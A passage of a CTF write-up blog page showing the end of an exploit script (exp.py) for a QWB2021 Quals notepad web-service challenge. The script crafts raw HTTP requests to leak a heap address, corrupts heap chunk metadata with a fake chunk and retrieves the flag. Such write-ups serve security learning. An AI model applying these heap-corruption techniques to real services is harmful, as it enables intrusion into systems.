HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Length: 65535\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Type: application/x-www-form-urlencoded\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"Note-Operation: &#123;&#125;\r\n"</span>.format(action)</span><br><span class="line">    payload += <span class="string">"Note-ID: &#123;&#125;\r\n"</span>.format(nid)</span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    payload += content</span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_delete</span><span class="params">(login_id, nid)</span>:</span></span><br><span class="line">    action = <span class="string">"delete%20note"</span></span><br><span class="line">    payload = <span class="string">"POST /notepad HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Content-Length: 100\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"Note-Operation: &#123;&#125;\r\n"</span>.format(action)</span><br><span class="line">    payload += <span class="string">"Note-ID: &#123;&#125;\r\n"</span>.format(nid)</span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">notepad_get</span><span class="params">(login_id)</span>:</span></span><br><span class="line">    payload = <span class="string">"GET /notepad HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"\r\n\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line">    <span class="keyword">return</span> ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getflag</span><span class="params">(login_id)</span>:</span></span><br><span class="line">    payload = <span class="string">"GET /flag HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    payload += <span class="string">"\r\n\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">waste</span><span class="params">(login_id)</span>:</span></span><br><span class="line">    payload = <span class="string">"GET /foo HTTP/1.1\r\n"</span></span><br><span class="line">    payload += <span class="string">"Login-ID: &#123;&#125;\r\n"</span>.format(login_id)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0x5</span>):</span><br><span class="line">        payload += <span class="string">"A"</span>*<span class="number">0x17</span> + <span class="string">": "</span> + <span class="string">"B"</span>*<span class="number">0x17</span> + <span class="string">"\r\n"</span></span><br><span class="line">    payload += <span class="string">"\r\n"</span></span><br><span class="line">    se(payload)</span><br><span class="line">    time.sleep(<span class="number">0.1</span>)</span><br><span class="line">    ru(<span class="string">"&lt;/html&gt;"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">urlencode</span><span class="params">(s)</span>:</span></span><br><span class="line">    ret = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> s:</span><br><span class="line">        ret += <span class="string">"%&#123;:02x&#125;"</span>.format(ord(c))</span><br><span class="line">    <span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line">login(<span class="string">"a"</span>)</span><br><span class="line">notepad_new(<span class="string">"a"</span>, <span class="string">"A"</span>*<span class="number">0x17</span>)</span><br><span class="line">notepad_new_vuln(<span class="string">"a"</span>, <span class="string">"A"</span>*<span class="number">0x17</span>)</span><br><span class="line">notepad_new_vuln(<span class="string">"a"</span>, <span class="string">"A"</span>*<span class="number">0x17</span>)</span><br><span class="line">content = notepad_get(<span class="string">'a'</span>)</span><br><span class="line">leak = re.findall(<span class="string">"&lt;p&gt;.*&lt;/p&gt;"</span>, content)</span><br><span class="line">leak = uu64(leak[<span class="number">1</span>][<span class="number">3</span>:<span class="number">11</span>])</span><br><span class="line">info_addr(<span class="string">"leak"</span>, leak)</span><br><span class="line">heap = leak-off</span><br><span class="line">info_addr(<span class="string">"heap"</span>, heap)</span><br><span class="line">waste(<span class="string">'a'</span>)</span><br><span class="line">notepad_new_vuln(<span class="string">"a"</span>, <span class="string">"A"</span>*<span class="number">0x17</span>)</span><br><span class="line"></span><br><span class="line">padding = (p64(<span class="number">0</span>) * <span class="number">3</span> + p64(<span class="number">0xf1</span>) + p64(<span class="number">0</span>))</span><br><span class="line">notepad_edit(<span class="string">'a'</span>, <span class="number">3</span>, urlencode(padding))</span><br><span class="line">padding = (p64(<span class="number">0</span>) * <span class="number">3</span> + p64(<span class="number">0xf1</span>) + p64(heap+<span class="number">0x4b0</span>))</span><br><span class="line">notepad_edit(<span class="string">'a'</span>, <span class="number">3</span>, urlencode(padding))</span><br><span class="line">fake = cyclic(<span class="number">0x10</span>) +p64(<span class="number">0</span>) + p64(<span class="number">0xd1</span>) + p64(<span class="number">0x1</span>) + p64(heap+<span class="number">0x5a0</span>) + p64(<span class="number">8</span>) + p64(<span class="number">1</span>)</span><br><span class="line">fake = fake.ljust(<span class="number">0xe7</span>, <span class="string">"\x00"</span>)</span><br><span class="line">notepad_new(<span class="string">"a"</span>, urlencode(fake), [<span class="string">"A"</span>*<span class="number">0xe7</span> + <span class="string">": "</span> + <span class="string">"b\r\n"</span>])</span><br><span class="line">getflag(<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>系列题目的第二问EzQtest放在下一篇，不然篇幅太长了。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/19/CTF2021-Favourite-Architecture-Challenges/" rel="next" title="[*CTF2021] Favourite Architecture Challenges">
                <i class="fa fa-chevron-left"></i> [*CTF2021] Favourite Architecture Challenges
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/06/15/QWB2021-Quals-EzQtest/" rel="prev" title="[QWB2021 Quals] - EzQtest">
                [QWB2021 Quals] - EzQtest <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description"></p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">68</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Recon"><span class="nav-number">1.</span> <span class="nav-text">Recon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit"><span class="nav-number">2.</span> <span class="nav-text">Exploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-py"><span class="nav-number">3.</span> <span class="nav-text">exp.py</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  



  




	





  





  

  




  
  

  

  

  

  


</body>
</html>
